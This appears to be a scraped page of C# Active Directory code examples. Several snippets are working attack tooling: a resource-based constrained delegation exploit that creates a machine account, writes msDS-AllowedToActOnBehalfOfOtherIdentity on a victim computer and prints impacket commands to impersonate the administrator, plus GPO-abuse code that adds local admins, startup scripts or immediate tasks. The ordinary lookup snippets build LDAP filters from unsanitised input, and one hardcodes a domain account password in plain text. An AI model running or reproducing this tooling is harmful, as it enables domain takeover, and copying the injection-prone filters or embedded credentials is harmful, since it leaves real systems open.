public HttpResponseMessage getActiveDirectoryUserDetail(HttpRequestMessage request, string loginid)
        {
            return(GetHttpResponse(request, () =>
            {
                HttpResponseMessage response = null;

                loginid = loginid.Replace("FORWARDSLASHXTER", "/").Trim();
                loginid = loginid.Replace("DOTXTER", ".").Trim();

                string connection = ConfigurationManager.ConnectionStrings["ADConnectionString"].ToString();

                System.DirectoryServices.DirectorySearcher dssearch = new System.DirectoryServices.DirectorySearcher(connection);
                dssearch.Filter = "(sAMAccountName=" + loginid + ")";
                System.DirectoryServices.SearchResult sresult = dssearch.FindOne();
                System.DirectoryServices.DirectoryEntry dsresult = sresult.GetDirectoryEntry();

                string firstname = Convert.ToString(dsresult.Properties["givenName"].Value);
                string lastname = Convert.ToString(dsresult.Properties["sn"].Value);  //sn means surname
                //string empid = Convert.ToString(dsresult.Properties["employeeID"].Value);
                string empid = Convert.ToString(dsresult.Properties["company"].Value);
                //string empno = Convert.ToString(dsresult.Properties["employeeNumber"].Value);
                string mail = Convert.ToString(dsresult.Properties["mail"].Value);


                var ADuserdetail = new UserSetup()
                {
                    //LoginID = loginid,
                    //Name = "Taiwo",
                    //Email = "*****@*****.**",
                    //StaffID = "empid"

                    LoginID = loginid,
                    Name = firstname + " " + lastname,
                    Email = mail,
                    StaffID = empid
                };

                response = request.CreateResponse <UserSetup>(HttpStatusCode.OK, ADuserdetail);

                return response;
            }));
        }
Exemplo n.º 2
0
        public static void SetSecurityDescriptor(String Domain, String victim_distinguished_name, String victimcomputer, String sid, bool cleanup)
        {
            // get the domain object of the victim computer and update its securty descriptor
            System.DirectoryServices.DirectoryEntry myldapConnection = new System.DirectoryServices.DirectoryEntry(Domain);
            myldapConnection.Path = "LDAP://" + victim_distinguished_name;
            myldapConnection.AuthenticationType = System.DirectoryServices.AuthenticationTypes.Secure;
            System.DirectoryServices.DirectorySearcher search = new System.DirectoryServices.DirectorySearcher(myldapConnection);
            search.Filter = "(cn=" + victimcomputer + ")";
            string[] requiredProperties = new string[] { "samaccountname" };

            foreach (String property in requiredProperties)
            {
                search.PropertiesToLoad.Add(property);
            }

            System.DirectoryServices.SearchResult result = null;
            try
            {
                result = search.FindOne();
            }
            catch (System.Exception ex)
            {
                Console.WriteLine(ex.Message + "Exiting...");
                return;
            }


            if (result != null)
            {
                System.DirectoryServices.DirectoryEntry entryToUpdate = result.GetDirectoryEntry();

                String sec_descriptor = "";
                if (!cleanup)
                {
                    sec_descriptor = "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;" + sid + ")";
                    System.Security.AccessControl.RawSecurityDescriptor sd = new RawSecurityDescriptor(sec_descriptor);
                    byte[] descriptor_buffer = new byte[sd.BinaryLength];
                    sd.GetBinaryForm(descriptor_buffer, 0);
                    // Add AllowedToAct Security Descriptor
                    entryToUpdate.Properties["msds-allowedtoactonbehalfofotheridentity"].Value = descriptor_buffer;
                }
                else
                {
                    // Cleanup attribute
                    Console.WriteLine("[+] Clearing attribute...");
                    entryToUpdate.Properties["msds-allowedtoactonbehalfofotheridentity"].Clear();
                }

                try
                {
                    // Commit changes to the security descriptor
                    entryToUpdate.CommitChanges();
                    Console.WriteLine("[+] Attribute changed successfully");
                    Console.WriteLine("[+] Done!");
                }
                catch (System.Exception ex)
                {
                    Console.WriteLine(ex.Message);
                    Console.WriteLine("[!] Could not update attribute!\nExiting...");
                    return;
                }
            }

            else
            {
                Console.WriteLine("[!] Computer Account not found!\nExiting...");
            }
            return;
        }
Exemplo n.º 3
0
        // Updage GPT.ini so that changes take effect without gpupdate /force
        public static void UpdateVersion(String Domain, String distinguished_name, String GPOName, String path, String function)
        {
            String        line     = "";
            List <string> new_list = new List <string>();

            if (!File.Exists(path))
            {
                Console.WriteLine("[-] Could not find GPT.ini. The group policy might need to be updated manually using 'gpupdate /force'");
            }

            // get the object of the GPO and update its versionNumber
            System.DirectoryServices.DirectoryEntry myldapConnection = new System.DirectoryServices.DirectoryEntry(Domain);
            myldapConnection.Path = "LDAP://" + distinguished_name;
            myldapConnection.AuthenticationType = System.DirectoryServices.AuthenticationTypes.Secure;
            System.DirectoryServices.DirectorySearcher search = new System.DirectoryServices.DirectorySearcher(myldapConnection);
            search.Filter = "(displayName=" + GPOName + ")";
            string[] requiredProperties = new string[] { "versionNumber", "gPCMachineExtensionNames" };


            foreach (String property in requiredProperties)
            {
                search.PropertiesToLoad.Add(property);
            }

            System.DirectoryServices.SearchResult result = null;
            try
            {
                result = search.FindOne();
            }
            catch (System.Exception ex)
            {
                Console.WriteLine(ex.Message + "[!] Exiting...");
                System.Environment.Exit(0);
            }

            int new_ver = 0;

            if (result != null)
            {
                System.DirectoryServices.DirectoryEntry entryToUpdate = result.GetDirectoryEntry();

                // get AD number of GPO and increase it by 1
                new_ver = Convert.ToInt32(entryToUpdate.Properties["versionNumber"].Value) + 1;
                entryToUpdate.Properties["versionNumber"].Value = new_ver;


                // update gPCMachineExtensionNames to add local admin
                if (function == "AddLocalAdmin" || function == "AddNewRights")
                {
                    try
                    {
                        if (!entryToUpdate.Properties["gPCMachineExtensionNames"].Value.ToString().Contains("[{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]"))
                        {
                            entryToUpdate.Properties["gPCMachineExtensionNames"].Value += "[{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]";
                        }
                    }
                    catch
                    {
                        entryToUpdate.Properties["gPCMachineExtensionNames"].Value = "[{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]";
                    }
                }


                // update gPCMachineExtensionNames to add immediate task
                if (function == "NewImmediateTask")
                {
                    try
                    {
                        if (!entryToUpdate.Properties["gPCMachineExtensionNames"].Value.ToString().Contains("[{00000000-0000-0000-0000-000000000000}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}][{AADCED64-746C-4633-A97C-D61349046527}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}]"))
                        {
                            entryToUpdate.Properties["gPCMachineExtensionNames"].Value += "[{00000000-0000-0000-0000-000000000000}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}][{AADCED64-746C-4633-A97C-D61349046527}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}]";
                        }
                    }
                    catch
                    {
                        entryToUpdate.Properties["gPCMachineExtensionNames"].Value = "[{00000000-0000-0000-0000-000000000000}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}][{AADCED64-746C-4633-A97C-D61349046527}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}]";
                    }
                }


                // update gPCMachineExtensionNames to add startup script
                if (function == "NewStartupScript")
                {
                    try
                    {
                        if (!entryToUpdate.Properties["gPCMachineExtensionNames"].Value.ToString().Contains("[{42B5FAAE-6536-11D2-AE5A-0000F87571E3}{40B6664F-4972-11D1-A7CA-0000F87571E3}]"))
                        {
                            entryToUpdate.Properties["gPCMachineExtensionNames"].Value += "[{42B5FAAE-6536-11D2-AE5A-0000F87571E3}{40B6664F-4972-11D1-A7CA-0000F87571E3}]";
                        }
                    }
                    catch
                    {
                        entryToUpdate.Properties["gPCMachineExtensionNames"].Value = "[{42B5FAAE-6536-11D2-AE5A-0000F87571E3}{40B6664F-4972-11D1-A7CA-0000F87571E3}]";
                    }
                }



                try
                {
                    // Commit changes to the security descriptor
                    entryToUpdate.CommitChanges();
                    Console.WriteLine("[+] versionNumber attribute changed successfully");
                }
                catch (System.Exception ex)
                {
                    Console.WriteLine(ex.Message);
                    Console.WriteLine("[!] Could not update versionNumber attribute!\nExiting...");
                    System.Environment.Exit(0);
                }
            }
            else
            {
                Console.WriteLine("[!] GPO not found!\nExiting...");
                System.Environment.Exit(0);
            }

            using (System.IO.StreamReader file = new System.IO.StreamReader(path))
            {
                while ((line = file.ReadLine()) != null)
                {
                    if (line.Replace(" ", "").Contains("Version="))
                    {
                        line = line.Split('=')[1];
                        line = "Version=" + Convert.ToString(new_ver);
                    }
                    new_list.Add(line);
                }
            }

            using (System.IO.StreamWriter file2 = new System.IO.StreamWriter(path))
            {
                foreach (string l in new_list)
                {
                    file2.WriteLine(l);
                }
            }
            Console.WriteLine("[+] The version number in GPT.ini was increased successfully.");

            if (function == "AddLocalAdmin")
            {
                Console.WriteLine("[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.\n[+] Done!");
            }

            else if (function == "NewStartupScript")
            {
                Console.WriteLine("[+] The GPO was modified to include a new startup script. Wait for the GPO refresh cycle.\n[+] Done!");
            }

            else if (function == "NewImmediateTask")
            {
                Console.WriteLine("[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.\n[+] Done!");
            }

            else if (function == "AddNewRights")
            {
                Console.WriteLine("[+] The GPO was modified to assign new rights to target user. Wait for the GPO refresh cycle.\n[+] Done!");
            }
        }
        public ActionResult <ADProperties> GetAdsProperties(string userName)
        {
            ADProperties aDProperties = new ADProperties();

            try
            {
                const string LDAP_PATH = "LDAP://10.12.0.8"; //"/CN=VCH USERS,DC=MUSA,DC=net";
                                                             //const string LDAP_DOMAIN = "10.12.0.8";//"exldap.example.com:5555";
                //const string FirstName = "Cinthia";
                //const string LastName = "Schram";
                string titleValue      = "";
                string departmentValue = "";
                using (var ade = new System.DirectoryServices.DirectoryEntry(LDAP_PATH, "vgh\\ngediya", "Ayush080982"))
                    using (var dss = new System.DirectoryServices.DirectorySearcher(ade))
                    {
                        // string filter = @"(&(givenname=" + FirstName + ")(sn=" + LastName + "))";
                        string filter = @"(&(sAMAccountName=" + userName + "))";
                        //dss.Filter = "(sAMAccountName=ngediya)";
                        dss.Filter = filter;
                        System.DirectoryServices.SearchResult   sresult  = dss.FindOne();
                        System.DirectoryServices.DirectoryEntry dsresult = sresult.GetDirectoryEntry();
                        //Console.WriteLine("First Name:" + dsresult.Properties["givenname"][0].ToString());
                        //Console.WriteLine("Last Name:" + dsresult.Properties["cn"][0].ToString());
                        //Console.WriteLine("Full Name:" + dsresult.Properties["name"][0].ToString());
                        //Console.WriteLine("Mail:" + dsresult.Properties["mail"][0].ToString());
                        //Console.WriteLine("LoginId" + dsresult.Properties["sAMAccountName"][0].ToString());

                        foreach (var item in sresult.Properties.PropertyNames)
                        {
                            try
                            {
                                if (dsresult.Properties[item.ToString()].Count > 0)
                                { //Console.WriteLine(item.ToString() + ":" + dsresult.Properties[item.ToString()][0].ToString());
                                    if (item.ToString() == "title")
                                    {
                                        titleValue         = dsresult.Properties[item.ToString()][0].ToString();
                                        aDProperties.Title = titleValue;
                                    }
                                    if (item.ToString() == "department")
                                    {
                                        departmentValue       = dsresult.Properties[item.ToString()][0].ToString();
                                        aDProperties.Location = departmentValue;
                                    }
                                    if (item.ToString() == "givenname")
                                    {
                                        aDProperties.FirstName = dsresult.Properties[item.ToString()][0].ToString();
                                    }
                                    if (item.ToString() == "sn")
                                    {
                                        aDProperties.LastName = dsresult.Properties[item.ToString()][0].ToString();
                                    }
                                    if (item.ToString() == "mail")
                                    {
                                        aDProperties.EmailAddress = dsresult.Properties[item.ToString()][0].ToString();
                                    }
                                }
                            }
                            catch (Exception ex)
                            {
                                //Console.WriteLine("Error ----->" + item.ToString());
                                return(null);
                            }
                        }
                    }

                return(aDProperties);
            }
            catch (Exception ex)
            {
                // _log.Log(LogLevel.Information, ex.Message);
                return(aDProperties);
            }
        }
Exemplo n.º 5
0
        static void Main(string[] args)
        {
            if (args.Length < 2)
            {
                Usage();
                return;
            }
            var arguments = new Dictionary <string, string>();

            foreach (string argument in args)
            {
                int idx = argument.IndexOf('=');
                if (idx > 0)
                {
                    arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1);
                }
            }

            if (!arguments.ContainsKey("domain") || !arguments.ContainsKey("dc") || !arguments.ContainsKey("tm"))
            {
                Usage();
                return;
            }
            String DomainController            = arguments["dc"];
            String Domain                      = arguments["domain"];
            String new_MachineAccount          = "";
            String new_MachineAccount_password = "";

            //添加的机器账户
            if (arguments.ContainsKey("ma"))
            {
                new_MachineAccount = arguments["ma"];
            }
            else
            {
                new_MachineAccount = RandomString(8);
            }
            //机器账户密码
            if (arguments.ContainsKey("ma"))
            {
                new_MachineAccount_password = arguments["mp"];
            }
            else
            {
                new_MachineAccount_password = RandomString(10);
            }

            String victimcomputer    = arguments["tm"];; //需要进行提权的机器
            String machine_account   = new_MachineAccount;
            String sam_account       = "";
            String DistinguishedName = "";

            if (machine_account.EndsWith("$"))
            {
                sam_account     = machine_account;
                machine_account = machine_account.Substring(0, machine_account.Length - 1);
            }
            else
            {
                sam_account = machine_account + "$";
            }
            String distinguished_name        = DistinguishedName;
            String victim_distinguished_name = DistinguishedName;

            String[] DC_array = null;

            distinguished_name        = "CN=" + machine_account + ",CN=Computers";
            victim_distinguished_name = "CN=" + victimcomputer + ",CN=Computers";
            DC_array = Domain.Split('.');

            foreach (String DC in DC_array)
            {
                distinguished_name        += ",DC=" + DC;
                victim_distinguished_name += ",DC=" + DC;
            }

            Console.WriteLine("[+] Elevate permissions on " + victimcomputer);
            Console.WriteLine("[+] Domain = " + Domain);
            Console.WriteLine("[+] Domain Controller = " + DomainController);
            Console.WriteLine("[+] New SAMAccountName = " + sam_account);
            //Console.WriteLine("[+] Distinguished Name = " + distinguished_name);
            //连接ldap
            System.DirectoryServices.Protocols.LdapDirectoryIdentifier identifier = new System.DirectoryServices.Protocols.LdapDirectoryIdentifier(DomainController, 389);
            //NetworkCredential nc = new NetworkCredential(username, password); //使用凭据登录
            System.DirectoryServices.Protocols.LdapConnection connection = null;
            //connection = new System.DirectoryServices.Protocols.LdapConnection(identifier, nc);
            connection = new System.DirectoryServices.Protocols.LdapConnection(identifier);
            connection.SessionOptions.Sealing = true;
            connection.SessionOptions.Signing = true;
            connection.Bind();
            var request = new System.DirectoryServices.Protocols.AddRequest(distinguished_name, new System.DirectoryServices.Protocols.DirectoryAttribute[] {
                new System.DirectoryServices.Protocols.DirectoryAttribute("DnsHostName", machine_account + "." + Domain),
                new System.DirectoryServices.Protocols.DirectoryAttribute("SamAccountName", sam_account),
                new System.DirectoryServices.Protocols.DirectoryAttribute("userAccountControl", "4096"),
                new System.DirectoryServices.Protocols.DirectoryAttribute("unicodePwd", Encoding.Unicode.GetBytes("\"" + new_MachineAccount_password + "\"")),
                new System.DirectoryServices.Protocols.DirectoryAttribute("objectClass", "Computer"),
                new System.DirectoryServices.Protocols.DirectoryAttribute("ServicePrincipalName", "HOST/" + machine_account + "." + Domain, "RestrictedKrbHost/" + machine_account + "." + Domain, "HOST/" + machine_account, "RestrictedKrbHost/" + machine_account)
            });

            //通过ldap找计算机
            System.DirectoryServices.DirectoryEntry myldapConnection = new System.DirectoryServices.DirectoryEntry(Domain);
            myldapConnection.Path = "LDAP://" + victim_distinguished_name;
            myldapConnection.AuthenticationType = System.DirectoryServices.AuthenticationTypes.Secure;
            System.DirectoryServices.DirectorySearcher search = new System.DirectoryServices.DirectorySearcher(myldapConnection);
            search.Filter = "(CN=" + victimcomputer + ")";
            string[] requiredProperties = new string[] { "samaccountname" };
            foreach (String property in requiredProperties)
            {
                search.PropertiesToLoad.Add(property);
            }
            System.DirectoryServices.SearchResult result = null;
            try
            {
                result = search.FindOne();
            }
            catch (System.Exception ex)
            {
                Console.WriteLine(ex.Message + "[-] Exiting...");
                return;
            }
            try
            {
                //添加机器账户
                connection.SendRequest(request);
                Console.WriteLine("[+] Machine account: " + machine_account + " Password: "******" added");
            }
            catch (System.Exception ex)
            {
                Console.WriteLine("[-] The new machine could not be created! User may have reached ms-DS-new_MachineAccountQuota limit.)");
                Console.WriteLine("[-] Exception: " + ex.Message);
                return;
            }
            // 获取新计算机对象的SID
            var new_request        = new System.DirectoryServices.Protocols.SearchRequest(distinguished_name, "(&(samAccountType=805306369)(|(name=" + machine_account + ")))", System.DirectoryServices.Protocols.SearchScope.Subtree, null);
            var new_response       = (System.DirectoryServices.Protocols.SearchResponse)connection.SendRequest(new_request);
            SecurityIdentifier sid = null;

            foreach (System.DirectoryServices.Protocols.SearchResultEntry entry in new_response.Entries)
            {
                try
                {
                    sid = new SecurityIdentifier(entry.Attributes["objectsid"][0] as byte[], 0);
                    Console.Out.WriteLine("[+] " + new_MachineAccount + " SID : " + sid.Value);
                }
                catch
                {
                    Console.WriteLine("[!] It was not possible to retrieve the SID.\nExiting...");
                    return;
                }
            }

            //设置资源约束委派
            if (result != null)
            {
                System.DirectoryServices.DirectoryEntry entryToUpdate = result.GetDirectoryEntry();
                String sec_descriptor    = @"O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;" + sid.Value + ")";
                RawSecurityDescriptor sd = new RawSecurityDescriptor(sec_descriptor);
                byte[] buffer            = new byte[sd.BinaryLength];
                sd.GetBinaryForm(buffer, 0);
                //测试sddl转换结果
                //RawSecurityDescriptor test_back = new RawSecurityDescriptor (buffer, 0);
                //Console.WriteLine(test_back.GetSddlForm(AccessControlSections.All));


                // 添加evilpc的sid到msds-allowedtoactonbehalfofotheridentity中
                try
                {
                    //entryToUpdate.Properties["msDS-AllowedToActOnBehalfOfOtherIdentity"].Value = buffer;
                    entryToUpdate.InvokeSet("msDS-AllowedToActOnBehalfOfOtherIdentity", buffer);
                    entryToUpdate.CommitChanges();//提交更改
                    entryToUpdate.Close();
                    Console.WriteLine("[+] Exploit successfully!");

                    //打印利用方式
                    Console.WriteLine("[+] Use impacket to get priv!\n\n[+] Command:\n");
                    Console.WriteLine("\ngetST.py -dc-ip {0} {1}/{2}$:{3} -spn cifs/{4}.{5} -impersonate administrator", DomainController, Domain, machine_account, new_MachineAccount_password, victimcomputer, Domain);
                    Console.WriteLine("\nexport KRB5CCNAME=administrator.ccache");
                    Console.WriteLine("\npsexec.py {0}/administrator@{1}.{2} -k -no-pass", Domain, victimcomputer, Domain);
                }
                catch (System.Exception ex)
                {
                    Console.WriteLine("[!] Error: " + ex.Message + " " + ex.InnerException);
                    Console.WriteLine("[!] Failed...");
                    return;
                }
            }
        }